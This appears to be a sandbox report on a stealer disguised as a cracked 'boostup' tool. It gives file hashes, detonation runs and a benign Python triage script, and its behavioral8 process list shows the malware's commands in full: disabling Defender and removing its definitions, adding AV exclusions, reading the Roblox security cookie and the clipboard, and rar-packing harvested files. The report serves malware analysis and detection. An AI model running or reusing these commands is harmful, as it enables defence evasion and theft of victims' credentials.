C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\vcruntime140_1.dll

MD5 7e668ab8a78bd0118b94978d154c85bc
SHA1 dbac42a02a8d50639805174afd21d45f3c56e3a0
SHA256 e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
SHA512 72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\pywintypes311.dll

MD5 90b786dc6795d8ad0870e290349b5b52
SHA1 592c54e67cf5d2d884339e7a8d7a21e003e6482f
SHA256 89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a
SHA512 c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

memory/3372-99-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

memory/3372-102-0x00007FFE88970000-0x00007FFE898FC000-memory.dmp

memory/3372-101-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

memory/3664-111-0x00007FF7903A0000-0x00007FF791B60000-memory.dmp
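Telling the interpreter apart from the payload in a listing like the one above is mechanical enough to script. The Python below is an added example (not part of the report and not the sandbox's or BlankGrabber's code) that parses this page's path-then-hashes layout, classifies each dropped file as CPython/MSVC runtime, bundled third-party dependency or sample-specific payload, recovers the packer from the extraction directory name (Nuitka's onefile_<PID>_<TIME> default, its ONEFIL~1 8.3 alias, PyInstaller's _MEI<n>) and returns the PIDs the memory dumps were taken from so they can be matched against the bootstrap PID. The sample text is excerpted from the behavioral12 and behavioral7 Files sections with some hash lines omitted; the name patterns used for classification are this example's own heuristics.

```python
"""Triage helper for a sandbox report's Files section (added example, not the
sandbox's or BlankGrabber's code). Parses this page's path-then-hashes layout,
separates the bundled Python runtime from the sample-specific payload, and
recovers the packer from the extraction directory. Name patterns are assumed."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

NUITKA_DIR = re.compile(r"[\\/](onefile_(\d+)_\d+)[\\/]", re.I)  # {TEMP}/onefile_{PID}_{TIME}
NUITKA_SHORT_DIR = re.compile(r"[\\/]ONEFIL~\d[\\/]", re.I)       # 8.3 alias of that directory
PYINSTALLER_DIR = re.compile(r"[\\/]_MEI\d+[\\/]", re.I)          # PyInstaller onefile
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$", re.I)
MEMDUMP_LINE = re.compile(r"^memory/(\d+)-\d+-0x[0-9a-f]+-0x[0-9a-f]+-memory\.dmp$", re.I)
# Stock CPython / MSVC runtime pieces (assumed list)
RUNTIME_NAME = re.compile(
    r"^(python3\d+\.dll|vcruntime140(_1)?\.dll|libcrypto-3\.dll|libssl-3\.dll|libffi-\d+\.dll)$", re.I)
# pywin32 ships its modules at top level, so match them by name rather than by package dir
PYWIN32_NAME = re.compile(r"^(pywintypes\d+\.dll|pythoncom\d+\.dll|win32\w*\.pyd)$", re.I)


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)
    category: str = "payload"         # runtime | dependency | payload
    packer: str | None = None         # nuitka-onefile | pyinstaller-onefile
    bootstrap_pid: int | None = None  # PID encoded in a Nuitka onefile directory name


def classify(path: str) -> tuple[str, str | None, int | None]:
    """Categorise one dropped-file path by its name and its extraction directory."""
    name = re.split(r"[\\/]", path)[-1].lower()
    packer, pid, rel = None, None, None
    if m := NUITKA_DIR.search(path):
        packer, pid, rel = "nuitka-onefile", int(m.group(2)), path[m.end():]
    elif m := NUITKA_SHORT_DIR.search(path):
        packer, rel = "nuitka-onefile", path[m.end():]
    elif m := PYINSTALLER_DIR.search(path):
        packer, rel = "pyinstaller-onefile", path[m.end():]
    inside_package = rel is not None and re.search(r"[\\/]", rel) is not None
    if RUNTIME_NAME.match(name):
        category = "runtime"
    elif inside_package or PYWIN32_NAME.match(name):
        category = "dependency"  # site-packages material the payload imports
    elif name.endswith(".pyd"):
        category = "runtime"     # top-level standard-library extension module
    else:
        category = "payload"
    return category, packer, pid


def parse_files_section(text: str) -> tuple[list[DroppedFile], set[int]]:
    """Return the dropped files and the set of PIDs that memory dumps were taken from."""
    files: list[DroppedFile] = []
    dump_pids: set[int] = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := MEMDUMP_LINE.match(line):
            dump_pids.add(int(m.group(1)))
        elif m := HASH_LINE.match(line):
            if files:  # hash lines belong to the path line just above them
                files[-1].hashes[m.group(1).upper()] = m.group(2).lower()
        else:
            category, packer, pid = classify(line)
            files.append(DroppedFile(line, category=category, packer=packer, bootstrap_pid=pid))
    return files, dump_pids


def payload_iocs(files: list[DroppedFile]) -> dict[str, str]:
    """SHA256 -> path for sample-specific files only; runtime hashes are left out."""
    return {f.hashes["SHA256"]: f.path
            for f in files if f.category == "payload" and "SHA256" in f.hashes}


# Excerpt of the behavioral12 and behavioral7 Files sections above (some hash lines omitted)
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\python311.dll
MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe
MD5 49d08125658272ff5c325f8789b6e6ee
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tls_client\dependencies\tls-client-64.dll
SHA256 ec4f40c5f1ac709313b027c16face4d83e0dafdbc466cff2ff5d029d00600a20

memory/3664-83-0x00007FF7903A0000-0x00007FF791B60000-memory.dmp
memory/3372-84-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI29522\python311.dll
MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
"""

if __name__ == "__main__":
    files, dumps = parse_files_section(SAMPLE_FILES)
    for f in files:
        print(f"{f.category:10} {f.packer or '-':20} {f.path}")
    print("payload IOCs:", payload_iocs(files), "dump PIDs:", dumps)
```

The bootstrap PID recovered from the directory name (3664) is one of the two dump PIDs, so the other (3372) is the child the bootstrap launched; a dump PID that matches neither would be worth a second look. The 8.3 alias case is handled separately because the short name carries no PID, so a listing that only used short names would lose that cross-check.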

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240508-en

Max time kernel

118s

Max time network

120s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Signatures

N/A (this run, like behavioral2, only opened the archive in Explorer; nothing inside it was executed, so the empty result says nothing about the payload)

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

151s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240611-en

Max time kernel

135s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  (process: C:\Windows\system32\rundll32.exe)

Checks BIOS information in registry

Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (process: C:\Windows\system32\rundll32.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  (process: C:\Windows\system32\rundll32.exe)

Checks whether UAC is enabled

evasion trojan
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  (process: C:\Windows\system32\rundll32.exe)

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4248,i,3549704109630749084,1975543916261970610,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8

Network

The entries below are the sandbox resolver's reverse (in-addr.arpa) lookups and Microsoft Edge/Bing traffic from the msedge.exe utility process; none is attributed to rundll32.exe, which on Windows 10 again recorded nothing beyond the VirtualBox/BIOS/UAC checks.

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/648-2-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-0-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-3-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-1-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-4-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-5-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-6-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-7-0x000000006DD20000-0x000000006E6FF000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  (process: C:\Users\Admin\AppData\Local\Temp\bound.exe)

Checks BIOS information in registry

Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  (process: C:\Users\Admin\AppData\Local\Temp\bound.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (process: C:\Users\Admin\AppData\Local\Temp\bound.exe)

bound.exe is not one of the archive members the sandbox launched (crack.dll, loader.exe, main.exe, config.yml), so it is evidently a second stage written to %TEMP% at runtime; it performs the same VirtualBox/BIOS/UAC checks that crack.dll performs through rundll32.exe in behavioral5 and behavioral6. This page ends before behavioral8's Processes and Files sections, so its hashes are not recorded here.

Loads dropped DLL

16 loads by C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe and 9 loads by C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe (no per-DLL indicator recorded)

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
9 matches (no indicator, process or target recorded)

UPX packed file

upx
56 matches (no indicator, process or target recorded)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks whether UAC is enabled

evasion trojan
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  (process: C:\Users\Admin\AppData\Local\Temp\bound.exe)

Looks up external IP address via web service

Indicator: ip-api.com (process and target not recorded)

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 2064 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4260 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3632 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 404 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5104 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3904 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2064 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\System32\Conhost.exe
PID 2080 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2064 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4192 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2064 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2064 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4288 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2064 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4240 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe
PID 2064 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1564 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 4424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2064 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe

bound.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start main.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgkvbgin\xgkvbgin.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57FE.tmp" "c:\Users\Admin\AppData\Local\Temp\xgkvbgin\CSC8FEAF05D191F4AD0858C536F835F62C5.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2416"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 2416

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4624"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4624

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3928"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 3928

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4220"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4220

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4756"

C:\Windows\system32\taskkill.exe

taskkill /F /PID 4756

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\J1fHz.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\J1fHz.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

